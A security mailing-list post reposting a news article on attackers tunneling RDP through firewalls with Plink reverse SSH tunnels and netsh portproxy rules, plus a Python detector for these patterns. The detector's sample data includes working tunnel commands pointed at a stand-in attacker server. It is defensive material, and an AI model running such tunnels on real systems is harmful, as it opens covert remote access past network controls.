[BreachExchange] HACKERS ARE USING ‘NETWORK TUNNELING’ TO BYPASS THE FIREWALL INSTEAD OF RDP

Destry Winant destry at riskbasedsecurity.com
Tue Jan 29 07:11:48 EST 2019


https://www.securitynewspaper.com/2019/01/25/hackers-are-using-network-tunneling-to-bypass-the-firewall-instead-of-rdp/

The network tunneling technique is increasingly being used by attackers who rely on RDP

The Remote Desktop Protocol (RDP) is a Windows component designed to
provide administrators and users with a remote access path to their
systems. According to a report cited by network security and ethical
hacking specialists from the International Institute of Cyber Security,
malicious actors have been abusing this legitimate feature to attack
vulnerable systems, because this kind of attack can be harder to
detect than a backdoor.

“Malicious users resort to the use of RDP because of its stability and
functionality over a backdoor. We have detected that hackers use the
native functions of Windows RDP to connect laterally through systems
in compromised environments,” commented the specialists.

According to network security specialists, access to a system via RDP
gives attackers persistence, although it depends on a separate initial
access vector, such as a phishing attack, to get into the environment
in the first place. In addition, attackers have increasingly resorted
to 'network tunneling' and host-based port forwarding.

With these techniques, an attacker who already controls a host behind
a firewall that blocks inbound RDP can open an outbound connection to a
remote server that the firewall does allow, and then use that
connection as transport to 'dig a tunnel' back through the firewall to
local services such as RDP.

A utility commonly used to tunnel RDP sessions is PuTTY Link (Plink),
a command-line SSH client that attackers use to establish SSH
connections to systems they control. According to network security
experts, because many environments neither inspect the protocol nor
block SSH traffic leaving their network, attackers can use the tool to
create an encrypted reverse tunnel and carry RDP sessions through it
to and from their command-and-control (C&C) server.

RDP sessions also allow attackers to move laterally through an
environment: attackers can use the native Windows network shell
command (netsh) to set up port forwarding that relays RDP traffic to
hosts on network segments they could not otherwise reach.

Host- and network-based prevention and detection mechanisms must give
organizations the defenses they need to mitigate these kinds of
attacks, experts say.

Disabling RDP when it is not in use and enabling host firewall rules
that block inbound RDP connections are also helpful measures for
reducing the risk.

At the network level, administrators should require that RDP
connections originate from a designated jump box or central
administration server, avoid using privileged accounts for RDP, review
firewall rules to identify port-forwarding weaknesses, and inspect the
content of network traffic.
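As an added illustration (example code written for this page, not code from the article or from the report it cites), here is a small Python detector that runs over constructed process-creation records in the shape of Sysmon Event ID 1 (image path plus command line) and flags the two techniques described above: an SSH client such as Plink or OpenSSH started with a reverse (-R) or local (-L) port forward, and a "netsh interface portproxy add" rule. The sample command lines, hosts, ports and password are made up, and the function and class names are the example's own.

```python
"""Flag SSH tunnels and netsh portproxy rules in process-creation logs."""
from dataclasses import dataclass, field

# Names of SSH clients commonly used to build tunnels. A renamed binary
# will slip past this check; in production match on file hash or on
# Sysmon's OriginalFileName rather than the on-disk name.
SSH_CLIENTS = {"plink.exe", "plink", "ssh.exe", "ssh", "putty.exe", "putty"}
RDP_PORT = 3389


@dataclass
class Finding:
    rule: str          # which pattern matched
    command: str       # the offending command line
    listen: str = ""   # where the forward listens
    target: str = ""   # where the forwarded traffic is delivered
    notes: list = field(default_factory=list)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _parse_forward(spec: str):
    """Split an OpenSSH/Plink forward spec '[bind:]port:host:hostport'
    into (listen, host, hostport); None if it does not look like one."""
    parts = spec.rsplit(":", 2)
    if len(parts) != 3 or not parts[2].isdigit():
        return None
    return parts[0], parts[1], int(parts[2])


def check_ssh_tunnel(image: str, cmdline: str) -> list:
    """Detect -R (reverse) and -L (local) forwards in an SSH client invocation."""
    if _basename(image) not in SSH_CLIENTS:
        return []
    tokens = cmdline.split()
    findings = []
    for i, tok in enumerate(tokens[:-1]):
        if tok not in ("-R", "-L"):
            continue
        fwd = _parse_forward(tokens[i + 1])
        if fwd is None:
            continue
        listen, host, port = fwd
        f = Finding("ssh_reverse_tunnel" if tok == "-R" else "ssh_local_forward",
                    cmdline, listen, f"{host}:{port}")
        if port == RDP_PORT:
            f.notes.append("forward targets RDP (3389)")
        if tok == "-R" and host in ("127.0.0.1", "localhost", "::1"):
            f.notes.append("exposes a local service to the remote SSH server")
        if "-pw" in tokens:  # Plink-specific: cleartext password on the command line
            f.notes.append("password passed on the command line (plink -pw)")
        findings.append(f)
    return findings


def check_portproxy(image: str, cmdline: str) -> list:
    """Detect 'netsh interface portproxy add' (host-based TCP port forwarding)."""
    tokens = cmdline.lower().split()
    if _basename(image) != "netsh.exe" or "portproxy" not in tokens or "add" not in tokens:
        return []
    kv = dict(t.split("=", 1) for t in tokens if "=" in t)
    # netsh defaults connectport to listenport when it is omitted.
    listen = f"{kv.get('listenaddress', '*')}:{kv.get('listenport', '?')}"
    target = f"{kv.get('connectaddress', '?')}:{kv.get('connectport', kv.get('listenport', '?'))}"
    f = Finding("netsh_portproxy_add", cmdline, listen, target)
    if target.endswith(f":{RDP_PORT}"):
        f.notes.append("forward targets RDP (3389)")
    return [f]


def analyze_event(image: str, cmdline: str) -> list:
    return check_ssh_tunnel(image, cmdline) + check_portproxy(image, cmdline)


def analyze(events) -> list:
    """events: iterable of (image_path, command_line) pairs."""
    return [f for image, cmd in events for f in analyze_event(image, cmd)]


# Constructed sample events in the shape of Sysmon Event ID 1 (image and
# command line). Hosts, ports and the password are made up for this example.
SAMPLE_EVENTS = [
    (r"C:\Users\j.doe\AppData\Local\Temp\plink.exe",
     "plink.exe -ssh -N -l svc -pw Passw0rd! -R 12345:127.0.0.1:3389 203.0.113.10"),
    (r"C:\Windows\System32\netsh.exe",
     "netsh interface portproxy add v4tov4 listenport=8001 listenaddress=0.0.0.0 "
     "connectport=3389 connectaddress=10.1.1.50"),
    (r"C:\Windows\System32\netsh.exe", "netsh advfirewall show allprofiles"),
    (r"C:\Windows\System32\OpenSSH\ssh.exe", "ssh -L 8080:127.0.0.1:80 dev@10.0.0.5"),
    (r"C:\Windows\System32\OpenSSH\ssh.exe", "ssh -R 0.0.0.0:2222:localhost:3389 ops@203.0.113.10"),
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f.rule}] listen={f.listen} -> {f.target}  {'; '.join(f.notes)}")
        print(f"    {f.command}")
```

The first sample line is the reverse-tunnel pattern described above: the compromised host opens an outbound SSH session and asks the attacker's server to listen on port 12345 and relay it back to the host's own 3389, so the attacker connects with RDP to their own server and lands on the victim. Command-line matching is only one signal; on the host, "netsh interface portproxy show all" and the registry key HKLM\SYSTEM\CurrentControlSet\Services\PortProxy list any portproxy rules that survive a reboot, and a tunnel built by a renamed SSH client is still visible as a long-lived outbound connection on port 22 from a workstation that has no business making one.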

